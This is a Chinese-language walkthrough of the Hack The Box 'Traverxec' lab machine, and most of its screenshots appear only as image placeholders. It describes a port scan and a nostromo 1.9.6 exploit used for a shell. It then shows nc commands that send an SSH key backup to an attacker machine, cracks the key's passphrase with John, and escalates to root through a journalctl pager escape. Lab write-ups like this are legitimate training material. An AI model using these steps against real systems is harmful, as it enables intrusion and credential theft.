image.png
image.png

常规扫端口:
nmap -A -sC 10.10.10.165

image.png
image.png

访问 80 端口,发现有个发邮件的功能

image.png
image.png

发现它的中间件是 nostromo 1.9.6

image.png
image.png

搜一下 exp

image.png
image.png

exp 直接利用,得到 www-data 权限的 shell

image.png
image.png

看一下 /etc/passwd,发现有个叫 david 的用户

image.png
image.png

可以使用:python -c "import pty;pty.spawn('/bin/bash')"
来生成一个比较好看的终端样子,就像下面这样

image.png
image.png

cd 到 /var/nostromo/conf 看一下有啥,ls -al 起码要用 -a 啊,不要错过什么东西

image.png
image.png

cat 一下 nhttpd.conf ,发现了一个叫 public_www 的文件夹

image.png
image.png

进去看一下:

image.png
image.png

新开一个终端,nc -lvp 10001 >backup-ssh-identity-files.tgz 用来接收那个压缩包
shell 里面使用 nc 10.10.15.84 10001 < backup-ssh-identity-files.tgz

这样就把压缩包给下到本地 kali 机了

image.png
image.png

下载出来的文件里有 ssh 的密钥

image.png
image.png

使用 jhon 破解一下看看把

/usr/share/john/ssh2john.py /root/Desktop/home/david/.ssh/id_rsa > id_rsa.hash
先换成 jhon 能识别的格式

/sbin/john /root/Desktop/home/david/.ssh/id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
rockyou.txt 字典爆破一波

image.png
image.png

得到密钥密码,hunter

ssh 登录一波

image.png
image.png

拿到 user.txt

image.png
image.png

在 bin 目录下发现其他的东西

image.png
image.png
image.png
image.png

在窗口被拉小的时候会触发应用,可以获取 root 的权限

运行 /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service 时,把窗口缩小一点,再输入!/bin/sh,成功获得 root 权限:

image.png
image.png

惊了!?

image.png
image.png

参考:
https://ca0y1h.top/Target_drone/HackTheBox/3.HTB-Traverxec-walkthrough/
https://www.lofter.com/lpost/1df46e99_1c73cc6b6